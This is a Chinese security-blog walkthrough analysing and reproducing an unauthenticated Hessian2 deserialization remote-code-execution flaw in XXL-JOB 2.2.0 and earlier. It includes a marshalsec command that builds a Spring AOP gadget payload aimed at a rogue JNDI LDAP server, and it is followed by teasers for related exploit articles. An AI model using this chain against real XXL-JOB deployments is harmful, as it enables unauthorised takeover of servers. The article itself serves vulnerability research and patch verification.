<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一步一步教你漏洞挖掘之XXL-JOB 未授權 Hessian2反序列化漏洞分析與復現

    VSole2021-11-01 05:27:36

    引言

    XXL-JOB是一個分布式任務調度平臺,其核心設計目標是開發迅速、學習簡單、輕量級、易擴展。現已開放源代碼并接入多家公司線上產品線,開箱即用。XXL-JOB v2.2.0及以下版本API接口存在Hessian2反序列化漏洞,可通過相關利用鏈結合JNDI注入實現RCE。

    環境構建

    0x01 MySQL數據庫配置

    wget https://raw.githubusercontent.com/xuxueli/xxl-job/2.0.2/doc/db/tables_xxl_job.sql
    

    導入數據庫:

    0x02 XXL-JOB配置

    wget https://github.com/xuxueli/xxl-job/archive/2.0.2.zip
    

    修改配置(`\xxl-job-2.0.2\xxl-job-admin\src\main\resources\application.properties`):

    將源代碼放入idea,直接可以啟動:

    源碼分析

    定位問題接口`JobApiController#api`

    `@PermessionLimit(limit=false)`說明該接口訪問不需要認證。跟進`invokeAdminService`,一直跟到`parseRequest`:

    存在Hessian2反序列化漏洞。

    漏洞復現

    目前Hessian公開的利用鏈主要如下:

    顯然適用于本案例的就是`Spring AOP`,需要結合JNDI注入,但是JDK版本較高,無法遠程加載惡意類。不過由于XXL-JOB默認運行在Tomcat之上,可以利用本地的工廠類進行RCE。這里利用rogue-jndi來進行利用:

    rogue-jndi
    https://github.com/veracode-research/rogue-jndi

    0x01 啟動JNDI服務

    0x02 生成Payload

    可利用`marshalsec`直接生成:

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor ldap://***:1389/o=tomcat > calc.ser
    

    0x03 發送數據包

    替換數據包的POST部分,發送即可復現漏洞:

    參考

    https://github.com/xuxueli/xxl-job

    http://itliusir.com/2018/scheduler-xxl-job/

    https://github.com/veracode-research/rogue-jndi

    https://github.com/mbechler/marshalsec

    漏洞挖掘序列化
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    漏洞挖掘是指對應用程序中未知漏洞的探索,通過綜合應用各種技術和工具,盡可能地找出其中的潛在漏洞。cookie的key為RememberMe,并對相關信息進行序列化,先使用aes加密,然后再使用base64編碼處理形成的。在網上關于Shiro反序列化的介紹很多,我這里就只簡單介紹一下,詳情各位可以看下大神們對其源碼的分析。
    攻擊者可在無需認證的情況下,通過構造特殊的請求,觸發反序列化,從而執行任意代碼,接管運行ForgeRock AM的服務器。本文從漏洞挖掘的角度分析其中的技術細節,也將公開一些其他的反序列化點。
    引言XXL-JOB是一個分布式任務調度平臺,其核心設計目標是開發迅速、學習簡單、輕量級、易擴展。現已開放源代碼并接入多家公司線上產品線,開箱即用。XXL-JOB v2.2.0及以下版本API接口存在Hessian2反序列化漏洞,可通過相關利用鏈結合JNDI注入實現RCE。
    對于公益SRC來說,想要沖榜就不能在一個站上浪費大量時間,公益SRC對洞的質量要求不高,所以只要 花時間,還是可以上榜的。在對某站點進行測試SQL注入的時候,先通過一些方式測試是否可能存在漏洞,然后可以直接sqlmap一把梭,也可以手工測試,然后提交漏洞。任意注冊算是低危漏洞,不過也有兩分。不管是進行SRC漏洞挖掘,還是做項目進行滲透測試,又或者是打紅藍對抗,一定要做好信息收集。
    最近兩個月我一直在做拒絕服務漏洞相關的時間,并收獲了Spring和Weblogic的兩個CVE但DoS漏洞終歸是雞肋洞,并沒有太大的意義,比如之前有人說我只會水垃圾洞而已,所以在以后可能打算做其他方向早上和pyn3rd師傅聊天
    0x00 前言CI框架作為PHP國外流行的框架,筆者有幸的挖掘到了它的反序列化POP鏈,其漏洞影響版本為4.*版本。
    一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞
    最近在學習Android APP客戶端漏洞挖掘過程中,對Android APP端漏洞挖掘做了一個基本的梳理總結本節主要是在介紹Android APP漏洞挖掘過程中,使用常見的Android漏洞挖掘工具的安裝和使用辦法,幫助Android漏洞挖掘人員提供便利。本文里面一部分的介紹采摘與網絡博客,大家可以點擊對應的網址進行查看。
    一次cms的漏洞挖掘體驗
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类